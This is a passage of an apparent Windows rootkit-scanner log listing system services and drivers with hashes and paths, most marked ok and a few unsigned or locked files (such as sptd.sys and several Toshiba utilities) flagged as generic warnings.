13:29:35.0444 4240	NwlnkFlt - ok
13:29:35.0452 4240	NwlnkFwd - ok
13:29:35.0522 4240	ohci1394 (6f310e890d46e246e0e261a63d9b36b4) C:\Windows\system32\DRIVERS\ohci1394.sys
13:29:35.0559 4240	ohci1394 - ok
13:29:35.0827 4240	p2pimsvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
13:29:35.0952 4240	p2pimsvc - ok
13:29:35.0962 4240	p2psvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
13:29:35.0993 4240	p2psvc - ok
13:29:36.0040 4240	Parport (0fa9b5055484649d63c303fe404e5f4d) C:\Windows\system32\drivers\parport.sys
13:29:36.0113 4240	Parport - ok
13:29:36.0161 4240	partmgr (b9c2b89f08670e159f7181891e449cd9) C:\Windows\system32\drivers\partmgr.sys
13:29:36.0177 4240	partmgr - ok
13:29:36.0259 4240	Parvdm (4f9a6a8a31413180d0fcb279ad5d8112) C:\Windows\system32\drivers\parvdm.sys
13:29:36.0347 4240	Parvdm - ok
13:29:36.0406 4240	PcaSvc (c6276ad11f4bb49b58aa1ed88537f14a) C:\Windows\System32\pcasvc.dll
13:29:36.0487 4240	PcaSvc - ok
13:29:36.0600 4240	pci (941dc1d19e7e8620f40bbc206981efdb) C:\Windows\system32\drivers\pci.sys
13:29:36.0647 4240	pci - ok
13:29:36.0664 4240	pciide (1636d43f10416aeb483bc6001097b26c) C:\Windows\system32\drivers\pciide.sys
13:29:36.0679 4240	pciide - ok
13:29:36.0785 4240	pcmcia (3bb2244f343b610c29c98035504c9b75) C:\Windows\system32\DRIVERS\pcmcia.sys
13:29:36.0805 4240	pcmcia - ok
13:29:36.0877 4240	pcouffin (5b6c11de7e839c05248ced8825470fef) C:\Windows\system32\Drivers\pcouffin.sys
13:29:36.0960 4240	pcouffin - ok
13:29:37.0032 4240	PEAUTH (6349f6ed9c623b44b52ea3c63c831a92) C:\Windows\system32\drivers\peauth.sys
13:29:37.0147 4240	PEAUTH - ok
13:29:37.0239 4240	pinger (6dbf2ac2bdaff355995ab25eccc4cfe1) C:\Toshiba\IVP\ISM\pinger.exe
13:29:37.0255 4240	pinger - ok
13:29:37.0815 4240	pla (b1689df169143f57053f795390c99db3) C:\Windows\system32\pla.dll
13:29:38.0072 4240	pla - ok
13:29:38.0594 4240	PlugPlay (c5e7f8a996ec0a82d508fd9064a5569e) C:\Windows\system32\umpnpmgr.dll
13:29:38.0670 4240	PlugPlay - ok
13:29:38.0791 4240	PNRPAutoReg (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
13:29:38.0842 4240	PNRPAutoReg - ok
13:29:38.0853 4240	PNRPsvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
13:29:38.0920 4240	PNRPsvc - ok
13:29:38.0988 4240	PolicyAgent (d0494460421a03cd5225cca0059aa146) C:\Windows\System32\ipsecsvc.dll
13:29:39.0062 4240	PolicyAgent - ok
13:29:39.0198 4240	PptpMiniport (ecfffaec0c1ecd8dbc77f39070ea1db1) C:\Windows\system32\DRIVERS\raspptp.sys
13:29:39.0240 4240	PptpMiniport - ok
13:29:39.0330 4240	Processor (0e3cef5d28b40cf273281d620c50700a) C:\Windows\system32\drivers\processr.sys
13:29:39.0413 4240	Processor - ok
13:29:39.0481 4240	ProfSvc (0508faa222d28835310b7bfca7a77346) C:\Windows\system32\profsvc.dll
13:29:39.0529 4240	ProfSvc - ok
13:29:39.0597 4240	ProtectedStorage (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
13:29:39.0614 4240	ProtectedStorage - ok
13:29:39.0681 4240	PSched (99514faa8df93d34b5589187db3aa0ba) C:\Windows\system32\DRIVERS\pacer.sys
13:29:39.0707 4240	PSched - ok
13:29:39.0964 4240	ql2300 (ccdac889326317792480c0a67156a1ec) C:\Windows\system32\drivers\ql2300.sys
13:29:40.0003 4240	ql2300 - ok
13:29:40.0083 4240	ql40xx (81a7e5c076e59995d54bc1ed3a16e60b) C:\Windows\system32\drivers\ql40xx.sys
13:29:40.0100 4240	ql40xx - ok
13:29:40.0266 4240 QWAVE (e9ecae663f47e6cb43962d18ab18890f) C:\Windows\system32\qwave.dll
13:29:40.0330 4240	QWAVE - ok
13:29:40.0385 4240	QWAVEdrv (9f5e0e1926014d17486901c88eca2db7) C:\Windows\system32\drivers\qwavedrv.sys
13:29:40.0420 4240	QWAVEdrv - ok
13:29:40.0510 4240	RasAcd (147d7f9c556d259924351feb0de606c3) C:\Windows\system32\DRIVERS\rasacd.sys
13:29:40.0560 4240	RasAcd - ok
13:29:40.0612 4240	RasAuto (f6a452eb4ceadbb51c9e0ee6b3ecef0f) C:\Windows\System32\rasauto.dll
13:29:40.0662 4240	RasAuto - ok
13:29:40.0718 4240	Rasl2tp (a214adbaf4cb47dd2728859ef31f26b0) C:\Windows\system32\DRIVERS\rasl2tp.sys
13:29:40.0849 4240	Rasl2tp - ok
13:29:40.0919 4240	RasMan (75d47445d70ca6f9f894b032fbc64fcf) C:\Windows\System32\rasmans.dll
13:29:40.0982 4240	RasMan - ok
13:29:41.0037 4240	RasPppoe (509a98dd18af4375e1fc40bc175f1def) C:\Windows\system32\DRIVERS\raspppoe.sys
13:29:41.0078 4240	RasPppoe - ok
13:29:41.0152 4240	RasSstp (2005f4a1e05fa09389ac85840f0a9e4d) C:\Windows\system32\DRIVERS\rassstp.sys
13:29:41.0189 4240	RasSstp - ok
13:29:41.0253 4240	rdbss (b14c9d5b9add2f84f70570bbbfaa7935) C:\Windows\system32\DRIVERS\rdbss.sys
13:29:41.0290 4240	rdbss - ok
13:29:41.0336 4240	RDPCDD (89e59be9a564262a3fb6c4f4f1cd9899) C:\Windows\system32\DRIVERS\RDPCDD.sys
13:29:41.0388 4240	RDPCDD - ok
13:29:41.0452 4240	rdpdr (e8bd98d46f2ed77132ba927fccb47d8b) C:\Windows\system32\drivers\rdpdr.sys
13:29:41.0513 4240	rdpdr - ok
13:29:41.0519 4240	RDPENCDD (9d91fe5286f748862ecffa05f8a0710c) C:\Windows\system32\drivers\rdpencdd.sys
13:29:41.0552 4240	RDPENCDD - ok
13:29:41.0642 4240	RDPWD (79c6df8477250f5c54f7c5ae1d6b814e) C:\Windows\system32\drivers\RDPWD.sys
13:29:41.0682 4240	RDPWD - ok
13:29:41.0748 4240	RemoteAccess (bcdd6b4804d06b1f7ebf29e53a57ece9) C:\Windows\System32\mprdim.dll
13:29:41.0782 4240	RemoteAccess - ok
13:29:41.0850 4240	RemoteRegistry (9e6894ea18daff37b63e1005f83ae4ab) C:\Windows\system32\regsvc.dll
13:29:41.0906 4240	RemoteRegistry - ok
13:29:41.0925 4240	RpcLocator (5123f83cbc4349d065534eeb6bbdc42b) C:\Windows\system32\locator.exe
13:29:42.0024 4240	RpcLocator - ok
13:29:42.0162 4240	RpcSs (3b5b4d53fec14f7476ca29a20cc31ac9) C:\Windows\system32\rpcss.dll
13:29:42.0232 4240	RpcSs - ok
13:29:42.0286 4240	rspndr (9c508f4074a39e8b4b31d27198146fad) C:\Windows\system32\DRIVERS\rspndr.sys
13:29:42.0329 4240	rspndr - ok
13:29:42.0363 4240	RTL8169 (5163f804256deb8cf1ef64b780a18caa) C:\Windows\system32\DRIVERS\Rtlh86.sys
13:29:42.0421 4240	RTL8169 - ok
13:29:42.0498 4240	SamSs (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
13:29:42.0515 4240	SamSs - ok
13:29:42.0594 4240	sbp2port (3ce8f073a557e172b330109436984e30) C:\Windows\system32\drivers\sbp2port.sys
13:29:42.0610 4240	sbp2port - ok
13:29:42.0707 4240	SCardSvr (77b7a11a0c3d78d3386398fbbea1b632) C:\Windows\System32\SCardSvr.dll
13:29:42.0764 4240	SCardSvr - ok
13:29:43.0049 4240	Schedule (1a58069db21d05eb2ab58ee5753ebe8d) C:\Windows\system32\schedsvc.dll
13:29:43.0143 4240	Schedule - ok
13:29:43.0205 4240	SCPolicySvc (312ec3e37a0a1f2006534913e37b4423) C:\Windows\System32\certprop.dll
13:29:43.0229 4240	SCPolicySvc - ok
13:29:44.0280 4240	sdbus (8f36b54688c31eed4580129040c6a3d3) C:\Windows\system32\DRIVERS\sdbus.sys
13:29:44.0306 4240	sdbus - ok
13:29:44.0400 4240	SDRSVC (716313d9f6b0529d03f726d5aaf6f191) C:\Windows\System32\SDRSVC.dll
13:29:44.0469 4240	SDRSVC - ok
13:29:44.0498 4240	secdrv (90a3935d05b494a5a39d37e71f09a677) C:\Windows\system32\drivers\secdrv.sys
13:29:44.0557 4240	secdrv - ok
13:29:44.0609 4240	seclogon (fd5199d4d8a521005e4b5ee7fe00fa9b) C:\Windows\system32\seclogon.dll
13:29:44.0657 4240	seclogon - ok
13:29:44.0674 4240	SENS (a9bbab5759771e523f55563d6cbe140f) C:\Windows\system32\sens.dll
13:29:44.0734 4240	SENS - ok
13:29:44.0758 4240	Serenum (68e44e331d46f0fb38f0863a84cd1a31) C:\Windows\system32\drivers\serenum.sys
13:29:44.0839 4240	Serenum - ok
13:29:44.0900 4240	Serial (c70d69a918b178d3c3b06339b40c2e1b) C:\Windows\system32\drivers\serial.sys
13:29:44.0958 4240	Serial - ok
13:29:45.0069 4240	sermouse (8af3d28a879bf75db53a0ee7a4289624) C:\Windows\system32\drivers\sermouse.sys
13:29:45.0072 4240	sermouse - ok
13:29:45.0363 4240	ServiceLayer (56eb980da71b94b79a341615c3c256cf) C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
13:29:45.0396 4240	ServiceLayer ( UnsignedFile.Multi.Generic ) - warning
13:29:45.0397 4240	ServiceLayer - detected UnsignedFile.Multi.Generic (1)
13:29:45.0502 4240	SessionEnv (d2193326f729b163125610dbf3e17d57) C:\Windows\system32\sessenv.dll
13:29:45.0558 4240	SessionEnv - ok
13:29:45.0597 4240	sffdisk (3efa810bdca87f6ecc24f9832243fe86) C:\Windows\system32\DRIVERS\sffdisk.sys
13:29:45.0644 4240	sffdisk - ok
13:29:45.0699 4240	sffp_mmc (8fd08a310645fe872eeec6e08c6bf3ee) C:\Windows\system32\drivers\sffp_mmc.sys
13:29:45.0778 4240	sffp_mmc - ok
13:29:45.0838 4240	sffp_sd (9f66a46c55d6f1ccabc79bb7afccc545) C:\Windows\system32\DRIVERS\sffp_sd.sys
13:29:45.0864 4240	sffp_sd - ok
13:29:45.0926 4240	sfloppy (46ed8e91793b2e6f848015445a0ac188) C:\Windows\system32\drivers\sfloppy.sys
13:29:46.0003 4240	sfloppy - ok
13:29:46.0083 4240	SharedAccess (e1499bd0ff76b1b2fbbf1af339d91165) C:\Windows\System32\ipnathlp.dll
13:29:46.0145 4240	SharedAccess - ok
13:29:46.0199 4240	ShellHWDetection (c7230fbee14437716701c15be02c27b8) C:\Windows\System32\shsvcs.dll
13:29:46.0242 4240	ShellHWDetection - ok
13:29:46.0266 4240	SI3132 (7d494c2000287595d87b9ff6b080d3ff) C:\Windows\system32\DRIVERS\SI3132.sys
13:29:46.0281 4240	SI3132 - ok
13:29:46.0349 4240	SiFilter (df978385397187ba5e5e1c9c56a80a1a) C:\Windows\system32\DRIVERS\SiWinAcc.sys
13:29:46.0362 4240	SiFilter - ok
13:29:46.0400 4240	simptcp (a275fbb7c99458c12e088dff3e58eb4d) C:\Windows\System32\tcpsvcs.exe
13:29:46.0472 4240	simptcp - ok
13:29:46.0495 4240	SiRemFil (aaab072321d75a366269a6d089f3d71e) C:\Windows\system32\DRIVERS\SiRemFil.sys
13:29:46.0508 4240	SiRemFil - ok
13:29:46.0532 4240	sisagp (d2a595d6eebeeaf4334f8e50efbc9931) C:\Windows\system32\drivers\sisagp.sys
13:29:46.0548 4240	sisagp - ok
13:29:46.0590 4240	SiSRaid2 (cedd6f4e7d84e9f98b34b3fe988373aa) C:\Windows\system32\drivers\sisraid2.sys
13:29:46.0605 4240	SiSRaid2 - ok
13:29:46.0627 4240	SiSRaid4 (df843c528c4f69d12ce41ce462e973a7) C:\Windows\system32\drivers\sisraid4.sys
13:29:46.0643 4240	SiSRaid4 - ok
13:29:46.0935 4240	slsvc (862bb4cbc05d80c5b45be430e5ef872f) C:\Windows\system32\SLsvc.exe
13:29:47.0207 4240	slsvc - ok
13:29:47.0432 4240	SLUINotify (6edc422215cd78aa8a9cde6b30abbd35) C:\Windows\system32\SLUINotify.dll
13:29:47.0459 4240	SLUINotify - ok
13:29:47.0543 4240	Smb (7b75299a4d201d6a6533603d6914ab04) C:\Windows\system32\DRIVERS\smb.sys
13:29:47.0568 4240	Smb - ok
13:29:47.0613 4240	SNMPTRAP (2a146a055b4401c16ee62d18b8e2a032) C:\Windows\System32\snmptrap.exe
13:29:47.0631 4240	SNMPTRAP - ok
13:29:47.0696 4240	spldr (7aebdeef071fe28b0eef2cdd69102bff) C:\Windows\system32\drivers\spldr.sys
13:29:47.0712 4240	spldr - ok
13:29:47.0786 4240	Spooler (8554097e5136c3bf9f69fe578a1b35f4) C:\Windows\System32\spoolsv.exe
13:29:47.0910 4240	Spooler - ok
13:29:48.0025 4240	sptd (7f1b7c4d446cd3f926af45b8c48bd593) C:\Windows\system32\Drivers\sptd.sys
13:29:48.0026 4240	Suspicious file (NoAccess): C:\Windows\system32\Drivers\sptd.sys. md5: 7f1b7c4d446cd3f926af45b8c48bd593
13:29:48.0028 4240	sptd ( LockedFile.Multi.Generic ) - warning
13:29:48.0028 4240	sptd - detected LockedFile.Multi.Generic (1)
13:29:48.0115 4240	srv (41987f9fc0e61adf54f581e15029ad91) C:\Windows\system32\DRIVERS\srv.sys
13:29:48.0188 4240	srv - ok
13:29:48.0254 4240	srv2 (ff33aff99564b1aa534f58868cbe41ef) C:\Windows\system32\DRIVERS\srv2.sys
13:29:48.0297 4240	srv2 - ok
13:29:48.0326 4240	srvnet (7605c0e1d01a08f3ecd743f38b834a44) C:\Windows\system32\DRIVERS\srvnet.sys
13:29:48.0356 4240	srvnet - ok
13:29:48.0420 4240	SSDPSRV (03d50b37234967433a5ea5ba72bc0b62) C:\Windows\System32\ssdpsrv.dll
13:29:48.0465 4240	SSDPSRV - ok
13:29:48.0574 4240	SstpSvc (6f1a32e7b7b30f004d9a20afadb14944) C:\Windows\system32\sstpsvc.dll
13:29:48.0615 4240	SstpSvc - ok
13:29:48.0781 4240	StarWindServiceAE (b1691af4a072cb674d600db16dd7308e) C:\Program Files\Alcohol Soft\Alcohol 52\StarWind\StarWindServiceAE.exe
13:29:48.0819 4240	StarWindServiceAE ( UnsignedFile.Multi.Generic ) - warning
13:29:48.0819 4240	StarWindServiceAE - detected UnsignedFile.Multi.Generic (1)
13:29:48.0881 4240	StillCam (ef70b3d22b4bffda6ea851ecb063efaa) C:\Windows\system32\DRIVERS\serscan.sys
13:29:48.0996 4240	StillCam - ok
13:29:49.0104 4240	stisvc (5de7d67e49b88f5f07f3e53c4b92a352) C:\Windows\System32\wiaservc.dll
13:29:49.0161 4240	stisvc - ok
13:29:49.0239 4240	swenum (7ba58ecf0c0a9a69d44b3dca62becf56) C:\Windows\system32\DRIVERS\swenum.sys
13:29:49.0240 4240	swenum - ok
13:29:49.0485 4240	swprv (f21fd248040681cca1fb6c9a03aaa93d) C:\Windows\System32\swprv.dll
13:29:49.0555 4240	swprv - ok
13:29:49.0614 4240	Swupdtmr (327786c5d6bcf284fab14c2b5751f514) c:\Toshiba\IVP\swupdate\swupdtmr.exe
13:29:49.0627 4240	Swupdtmr - ok
13:29:49.0676 4240	Symc8xx (192aa3ac01df071b541094f251deed10) C:\Windows\system32\drivers\symc8xx.sys
13:29:49.0691 4240	Symc8xx - ok
13:29:49.0742 4240	Sym_hi (8c8eb8c76736ebaf3b13b633b2e64125) C:\Windows\system32\drivers\sym_hi.sys
13:29:49.0757 4240	Sym_hi - ok
13:29:49.0776 4240	Sym_u3 (8072af52b5fd103bbba387a1e49f62cb) C:\Windows\system32\drivers\sym_u3.sys
13:29:49.0792 4240	Sym_u3 - ok
13:29:49.0847 4240	SynTP (5efcedcf3daf5c8d9e8b77a34a4eec99) C:\Windows\system32\DRIVERS\SynTP.sys
13:29:49.0866 4240	SynTP - ok
13:29:49.0971 4240	SysMain (9a51b04e9886aa4ee90093586b0ba88d) C:\Windows\system32\sysmain.dll
13:29:50.0075 4240	SysMain - ok
13:29:50.0119 4240	TabletInputService (2dca225eae15f42c0933e998ee0231c3) C:\Windows\System32\TabSvc.dll
13:29:50.0152 4240	TabletInputService - ok
13:29:50.0256 4240	TapiSrv (d7673e4b38ce21ee54c59eeeb65e2483) C:\Windows\System32\tapisrv.dll
13:29:50.0272 4240	TapiSrv - ok
13:29:50.0443 4240	TBS (cb05822cd9cc6c688168e113c603dbe7) C:\Windows\System32\tbssvc.dll
13:29:50.0493 4240	TBS - ok
13:29:50.0661 4240	Tcpip (ee7e10bed85c312c1d5d30c435bdda9f) C:\Windows\system32\drivers\tcpip.sys
13:29:50.0759 4240	Tcpip - ok
13:29:50.0773 4240	Tcpip6 (ee7e10bed85c312c1d5d30c435bdda9f) C:\Windows\system32\DRIVERS\tcpip.sys
13:29:50.0865 4240	Tcpip6 - ok
13:29:50.0904 4240	tcpipreg (2c2d4cff5e09c73908f9b5af49a51365) C:\Windows\system32\drivers\tcpipreg.sys
13:29:50.0973 4240	tcpipreg - ok
13:29:51.0003 4240	tdcmdpst (1825bceb47bf41c5a9f0e44de82fc27a) C:\Windows\system32\DRIVERS\tdcmdpst.sys
13:29:51.0030 4240	tdcmdpst - ok
13:29:51.0073 4240	TDPIPE (5dcf5e267be67a1ae926f2df77fbcc56) C:\Windows\system32\drivers\tdpipe.sys
13:29:51.0120 4240	TDPIPE - ok
13:29:51.0138 4240	TDTCP  (389c63e32b3cefed425b61ed92d3f021) C:\Windows\system32\drivers\tdtcp.sys
13:29:51.0189 4240	TDTCP - ok
13:29:51.0307 4240	tdx (76b06eb8a01fc8624d699e7045303e54) C:\Windows\system32\DRIVERS\tdx.sys
13:29:51.0322 4240	tdx - ok
13:29:51.0549 4240	TeamViewer6 (fe559178000347d2ca1b7847f0379749) C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
13:29:51.0685 4240	TeamViewer6 - ok
13:29:51.0905 4240	TermDD (3cad38910468eab9a6479e2f01db43c7) C:\Windows\system32\DRIVERS\termdd.sys
13:29:51.0921 4240	TermDD - ok
13:29:52.0006 4240	TermService (bb95da09bef6e7a131bff3ba5032090d) C:\Windows\System32\termsrv.dll
13:29:52.0121 4240	TermService - ok
13:29:52.0200 4240	Themes (c7230fbee14437716701c15be02c27b8) C:\Windows\system32\shsvcs.dll
13:29:52.0221 4240	Themes - ok
13:29:52.0339 4240	THREADORDER (1076ffcffaae8385fd62dfcb25ac4708) C:\Windows\system32\mmcss.dll
13:29:52.0371 4240	THREADORDER - ok
13:29:52.0415 4240	tifm21 (28b7f973c36d157a7885b1ae42a4a2a9) C:\Windows\system32\drivers\tifm21.sys
13:29:52.0525 4240	tifm21 - ok
13:29:52.0647 4240	TNaviSrv (38e18dce385ff2ded57423a279559dbc) C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
13:29:52.0663 4240	TNaviSrv ( UnsignedFile.Multi.Generic ) - warning
13:29:52.0663 4240	TNaviSrv - detected UnsignedFile.Multi.Generic (1)
13:29:52.0684 4240	TODDSrv (d540858e65bfa6fded41ad2495ece344) C:\Windows\system32\TODDSrv.exe
13:29:52.0711 4240	TODDSrv ( UnsignedFile.Multi.Generic ) - warning
13:29:52.0711 4240	TODDSrv - detected UnsignedFile.Multi.Generic (1)
13:29:52.0849 4240	TosCoSrv (6a54c28b53c6b50d333c8ee974c6b208) C:\Program Files\Toshiba\Power Saver\TosCoSrv.exe
13:29:52.0970 4240	TosCoSrv - ok
13:29:52.0982 4240	Tosrfcom - ok
13:29:53.0062 4240	tos_sps32 (1ea5f27c29405bf49799feca77186da9) C:\Windows\system32\DRIVERS\tos_sps32.sys
13:29:53.0085 4240	tos_sps32 - ok
13:29:53.0091 4240	TpChoice - ok
13:29:53.0151 4240	TrkWks (ec74e77d0eb004bd3a809b5f8fb8c2ce) C:\Windows\System32\trkwks.dll
13:29:53.0186 4240	TrkWks - ok
13:29:53.0277 4240	TrustedInstaller (97d9d6a04e3ad9b6c626b9931db78dba) C:\Windows\servicing\TrustedInstaller.exe
13:29:53.0301 4240	TrustedInstaller - ok
13:29:53.0395 4240	tssecsrv (dcf0f056a2e4f52287264f5ab29cf206) C:\Windows\system32\DRIVERS\tssecsrv.sys
13:29:53.0417 4240	tssecsrv - ok
13:29:53.0467 4240	tunmp (caecc0120ac49e3d2f758b9169872d38) C:\Windows\system32\DRIVERS\tunmp.sys
13:29:53.0483 4240	tunmp - ok
13:29:53.0577 4240	tunnel (300db877ac094feab0be7688c3454a9c) C:\Windows\system32\DRIVERS\tunnel.sys
13:29:53.0592 4240	tunnel - ok
13:29:53.0624 4240	TVALZ (792a8b80f8188aba4b2be271583f3e46) C:\Windows\system32\DRIVERS\TVALZ_O.SYS
13:29:53.0637 4240	TVALZ - ok
13:29:53.0720 4240	uagp35 (c3ade15414120033a36c0f293d4a4121) C:\Windows\system32\drivers\uagp35.sys
13:29:53.0734 4240	uagp35 - ok
13:29:53.0862 4240	udfs (d9728af68c4c7693cb100b8441cbdec6) C:\Windows\system32\DRIVERS\udfs.sys
13:29:53.0891 4240	udfs - ok
13:29:53.0963 4240	UI0Detect (ecef404f62863755951e09c802c94ad5) C:\Windows\system32\UI0Detect.exe
13:29:53.0996 4240	UI0Detect - ok
13:29:54.0112 4240	UleadBurningHelper (332d341d92b933600d41953b08360dfb) C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
13:29:54.0137 4240	UleadBurningHelper ( UnsignedFile.Multi.Generic ) - warning
13:29:54.0137 4240	UleadBurningHelper - detected UnsignedFile.Multi.Generic (1)
13:29:54.0178 4240	uliagpkx (75e6890ebfce0841d3291b02e7a8bdb0) C:\Windows\system32\drivers\uliagpkx.sys
13:29:54.0193 4240	uliagpkx - ok
13:29:54.0260 4240	uliahci (3cd4ea35a6221b85dcc25daa46313f8d) C:\Windows\system32\drivers\uliahci.sys
13:29:54.0279 4240	uliahci - ok
13:29:54.0310 4240	UlSata (8514d0e5cd0534467c5fc61be94a569f) C:\Windows\system32\drivers\ulsata.sys
13:29:54.0327 4240	UlSata - ok
13:29:54.0408 4240	ulsata2 (38c3c6e62b157a6bc46594fada45c62b) C:\Windows\system32\drivers\ulsata2.sys
13:29:54.0438 4240	ulsata2 - ok
13:29:54.0481 4240	umbus (32cff9f809ae9aed85464492bf3e32d2) C:\Windows\system32\DRIVERS\umbus.sys
13:29:54.0525 4240	umbus - ok
13:29:54.0592 4240	upnphost (68308183f4ae0be7bf8ecd07cb297999) C:\Windows\System32\upnphost.dll
13:29:54.0655 4240	upnphost - ok
13:29:54.0734 4240	USBAAPL (83cafcb53201bbac04d822f32438e244) C:\Windows\system32\Drivers\usbaapl.sys
13:29:54.0812 4240	USBAAPL ( UnsignedFile.Multi.Generic ) - warning
13:29:54.0812 4240	USBAAPL - detected UnsignedFile.Multi.Generic (1)
13:29:54.0867 4240	usbaudio (32db9517628ff0d070682aab61e688f0) C:\Windows\system32\drivers\usbaudio.sys
13:29:54.0921 4240	usbaudio - ok
13:29:54.0977 4240	usbccgp (caf811ae4c147ffcd5b51750c7f09142) C:\Windows\system32\DRIVERS\usbccgp.sys
13:29:55.0090 4240	usbccgp - ok
13:29:55.0122 4240	usbcir (e9476e6c486e76bc4898074768fb7131) C:\Windows\system32\drivers\usbcir.sys
13:29:55.0201 4240	usbcir - ok
13:29:55.0226 4240	usbehci (79e96c23a97ce7b8f14d310da2db0c9b) C:\Windows\system32\DRIVERS\usbehci.sys
13:29:55.0259 4240	usbehci - ok
13:29:55.0286 4240	usbhub (4673bbcb006af60e7abddbe7a130ba42) C:\Windows\system32\DRIVERS\usbhub.sys
13:29:55.0340 4240	usbhub - ok
13:29:55.0397 4240	usbohci (ce697fee0d479290d89bec80dfe793b7) C:\Windows\system32\DRIVERS\usbohci.sys
13:29:55.0441 4240	usbohci - ok
13:29:55.0505 4240	usbprint (e75c4b5269091d15a2e7dc0b6d35f2f5) C:\Windows\system32\DRIVERS\usbprint.sys
13:29:55.0561 4240	usbprint - ok
13:29:55.0629 4240	usbscan (a508c9bd8724980512136b039bba65e9) C:\Windows\system32\DRIVERS\usbscan.sys
13:29:55.0654 4240	usbscan - ok
13:29:55.0743 4240	USBSTOR (be3da31c191bc222d9ad503c5224f2ad) C:\Windows\system32\DRIVERS\USBSTOR.SYS
13:29:55.0793 4240	USBSTOR - ok
13:29:55.0831 4240	usbuhci (325dbbacb8a36af9988ccf40eac228cc) C:\Windows\system32\DRIVERS\usbuhci.sys
13:29:55.0905 4240	usbuhci - ok
13:29:55.0946 4240	usbvideo (0a6b81f01bc86399482e27e6fda7b33b) C:\Windows\system32\Drivers\usbvideo.sys
13:29:56.0020 4240	usbvideo - ok
13:29:56.0051 4240	UVCFTR (5701a984efa8e209848a6d556dd02933) C:\Windows\system32\DRIVERS\UVCFTR_S.SYS
13:29:56.0074 4240	UVCFTR - ok
13:29:56.0142 4240	UxSms (1509e705f3ac1d474c92454a5c2dd81f) C:\Windows\System32\uxsms.dll
13:29:56.0186 4240	UxSms - ok
13:29:56.0288 4240	vds (cd88d1b7776dc17a119049742ec07eb4) C:\Windows\System32\vds.exe
13:29:56.0360 4240	vds - ok
13:29:56.0412 4240	vga (7d92be0028ecdedec74617009084b5ef) C:\Windows\system32\DRIVERS\vgapnp.sys
13:29:56.0492 4240	vga - ok
13:29:56.0556 4240	VgaSave (2e93ac0a1d8c79d019db6c51f036636c) C:\Windows\System32\drivers\vga.sys
13:29:56.0613 4240	VgaSave - ok
13:29:56.0656 4240	viaagp (045d9961e591cf0674a920b6ba3ba5cb) C:\Windows\system32\drivers\viaagp.sys
13:29:56.0671 4240	viaagp - ok
13:29:56.0695 4240	ViaC7 (56a4de5f02f2e88182b0981119b4dd98) C:\Windows\system32\drivers\viac7.sys
13:29:56.0776 4240	ViaC7 - ok
13:29:56.0832 4240	viaide (fd2e3175fcada350c7ab4521dca187ec) C:\Windows\system32\drivers\viaide.sys
13:29:56.0846 4240	viaide - ok
13:29:56.0906 4240	volmgr (69503668ac66c77c6cd7af86fbdf8c43) C:\Windows\system32\drivers\volmgr.sys
13:29:56.0922 4240	volmgr - ok
13:29:57.0012 4240	volmgrx (23e41b834759917bfd6b9a0d625d0c28) C:\Windows\system32\drivers\volmgrx.sys
13:29:57.0034 4240	volmgrx - ok
13:29:57.0126 4240	volsnap (147281c01fcb1df9252de2a10d5e7093) C:\Windows\system32\drivers\volsnap.sys
13:29:57.0149 4240	volsnap - ok
13:29:57.0234 4240	vsmraid (d984439746d42b30fc65a4c3546c6829) C:\Windows\system32\drivers\vsmraid.sys
13:29:57.0250 4240	vsmraid - ok
13:29:57.0461 4240	VSS (db3d19f850c6eb32bdcb9bc0836acddb) C:\Windows\system32\vssvc.exe
13:29:57.0589 4240	VSS - ok
13:29:57.0651 4240	W32Time (96ea68b9eb310a69c25ebb0282b2b9de) C:\Windows\system32\w32time.dll
13:29:57.0694 4240	W32Time - ok
13:29:57.0830 4240	W3SVC (9ca92191c8f18e8b491a5b28e63c07b7) C:\Windows\system32\inetsrv\iisw3adm.dll
13:29:57.0951 4240	W3SVC - ok
13:29:58.0050 4240	WacomPen (48dfee8f1af7c8235d4e626f0c4fe031) C:\Windows\system32\drivers\wacompen.sys
13:29:58.0107 4240	WacomPen - ok
13:29:58.0198 4240	Wanarp (55201897378cca7af8b5efd874374a26) C:\Windows\system32\DRIVERS\wanarp.sys
13:29:58.0241 4240	Wanarp - ok
13:29:58.0246 4240	Wanarpv6 (55201897378cca7af8b5efd874374a26) C:\Windows\system32\DRIVERS\wanarp.sys
13:29:58.0275 4240	Wanarpv6 - ok
13:29:58.0287 4240	WAS (9ca92191c8f18e8b491a5b28e63c07b7) C:\Windows\system32\inetsrv\iisw3adm.dll
13:29:58.0311 4240	WAS - ok
13:29:58.0378 4240	wcncsvc (a3cd60fd826381b49f03832590e069af) C:\Windows\System32\wcncsvc.dll
13:29:58.0416 4240	wcncsvc - ok
13:29:58.0486 4240	WcsPlugInService (11bcb7afcdd7aadacb5746f544d3a9c7) C:\Windows\System32\WcsPlugInService.dll
13:29:58.0527 4240	WcsPlugInService - ok
13:29:58.0566 4240	Wd (afc5ad65b991c1e205cf25cfdbf7a6f4) C:\Windows\system32\drivers\wd.sys
13:29:58.0581 4240	Wd - ok
13:29:58.0665 4240	Wdf01000 (b6f0a7ad6d4bd325fbcd8bac96cd8d96) C:\Windows\system32\drivers\Wdf01000.sys
13:29:58.0694 4240	Wdf01000 - ok
13:29:58.0831 4240	WdiServiceHost (abfc76b48bb6c96e3338d8943c5d93b5) C:\Windows\system32\wdi.dll
13:29:58.0866 4240	WdiServiceHost - ok
13:29:58.0871 4240	WdiSystemHost (abfc76b48bb6c96e3338d8943c5d93b5) C:\Windows\system32\wdi.dll
13:29:58.0908 4240	WdiSystemHost - ok
13:29:58.0986 4240	WebClient (04c37d8107320312fbae09926103d5e2) C:\Windows\System32\webclnt.dll
13:29:59.0010 4240	WebClient - ok
13:29:59.0065 4240	Wecsvc (ae3736e7e8892241c23e4ebbb7453b60) C:\Windows\system32\wecsvc.dll
13:29:59.0090 4240	Wecsvc - ok
13:29:59.0147 4240	wercplsupport (670ff720071ed741206d69bd995ea453) C:\Windows\System32\wercplsupport.dll
13:29:59.0202 4240	wercplsupport - ok
13:29:59.0265 4240	WerSvc (32b88481d3b326da6deb07b1d03481e7) C:\Windows\System32\WerSvc.dll
